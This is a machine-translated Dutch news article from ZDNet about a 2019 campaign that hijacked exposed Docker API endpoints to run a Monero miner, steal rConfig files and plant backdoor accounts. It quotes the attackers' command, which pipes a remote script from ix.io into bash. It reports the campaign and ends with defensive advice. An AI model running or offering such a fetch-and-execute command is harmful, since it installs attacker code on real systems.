Een hacken van de groep is het kapen van Docker systemen met zichtbare API eindpunten

0
163

Catalin Cimpanu

Door Catalin Cimpanu

voor Zero Day

| 26 November 2019 — 02:12 GMT (02:12 GMT)

| Onderwerp: Security

Docker

Afbeelding: Docker, ZDNet

Een hacken van de groep is momenteel massa-scannen het internet op zoek naar Docker platforms die API eindpunten blootgesteld online.

Het doel van deze scans is om de hacker groep om opdrachten te verzenden naar de Dokwerker aanleg en het implementeren van een cryptocurrency mijnwerker op een bedrijf, het Koppelvenster gevallen, om middelen te genereren voor de eigen winst.

Een professionele werking

Dit specifieke massa-scannen operatie begonnen in het weekend, op 24 November, en stonden onmiddellijk op door zijn enorme omvang.

“Gebruikers van de Slechte Pakketten CTI API opmerking die misbruik maken van de activiteit targeting blootgesteld Docker gevallen is niets nieuws en gebeurt vaak,” Troy Mursch, chief research officer en mede-oprichter van Slechte Pakketten LLC, vertelde ZDNet vandaag.

“Wat stel deze campagne apart was de grote stijging van de activiteit van het scannen. Dit is alleen gerechtvaardigd verder onderzoek om uit te vinden wat dit botnet was,” zei hij.

“Zoals anderen al hebben opgemerkt [1, 2], dit is niet uw gemiddelde script kiddie poging tot misbruik,” Mursch, de ontdekker van de campagne, verteld. “Er was een gematigd niveau van energie te steken in deze campagne, en we hebben het nog niet volledig geanalyseerd van elk ding het doet nog.”

Wat we tot nu toe weten

Wat we tot nu toe weten is dat de groep achter deze aanslagen is op dit moment het scannen meer dan 59,000 IP-netwerken (netblokken) op zoek naar blootgesteld Docker exemplaren.

Zodra de groep identificeert een open host, aanvallers gebruik maken van de API-eindpunt om te beginnen met een Alpine Linux OS container waar ze de volgende opdracht uitvoeren:

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

Het bovenstaande commando downloadt en draait een Bash-script van de aanvallers’ server. Dit script installeert een klassieke XMRRig cryptocurrency mijnwerker. In de twee dagen sinds deze campagne actief is geweest, hackers hebben al gewonnen 14.82 Monero munten (XMR), ter waarde van iets meer dan $740, Mursch opgemerkt.

docker-campaign-xmrhunter.png

Daarnaast is deze malware werking komt ook met een self-defense meten.

“Een banale maar interessante functie van de campagne is dat het verwijdert bekend agenten en doodt een heleboel processen via een script gedownload van http://ix[.]io/1XQh,” Mursch ons verteld.

Op zoek door middel van dit script, dat we niet alleen zien dat hackers zijn het uitschakelen van security producten, maar ze zijn het afsluiten van het lso processen die samenhangen met rivaal cryptocurrency-mijnbouw botnets, zoals DDG.

Daarnaast Mursch ontdekte ook een functie van het kwaadaardige script scant een besmette gastheer voor rConfig configuratie bestanden, worden deze gecodeerd en steelt, het versturen van de bestanden terug naar de groep ‘ s command and control server.

Bovendien, Craig H. Rowland, de oprichter van de Eerste Security, heeft ook gemerkt dat hackers ook het creëren van backdoor-accounts op de gehackte containers, en het verlaten van SSH sleutels achter voor eenvoudige toegang, en een manier om alle besmette bots vanaf een externe locatie.

Voor het moment, Mursch raadt gebruikers en organisaties die Docker gevallen direct controleren of ze bloot API eindpunten op het internet, sluit de poorten, en vervolgens te beëindigen onbekende uitgevoerd containers.

Veiligheid

Chrome Rand, Safari gehackt elite Chinese hack wedstrijd

Duizenden gehackte Disney+ accounts zijn al te koop op het hacken van forums

Cybersecurity is op weg naar een recruitment crisis: Hier is hoe we het probleem oplossen

De vaststelling van het lekken van gegevens in Jira (ZDNet YouTube)

Beste home security 2019: Professionele monitoring en DIY (CNET)

Hoe om te bepalen locatie bijhouden op je iPhone in iOS 13 (TechRepublic)

Verwante Onderwerpen:

Cloud

Beveiliging TV

Data Management

CXO

Datacenters

Catalin Cimpanu

Door Catalin Cimpanu

voor Zero Day

| 26 November 2019 — 02:12 GMT (02:12 GMT)

| Onderwerp: Security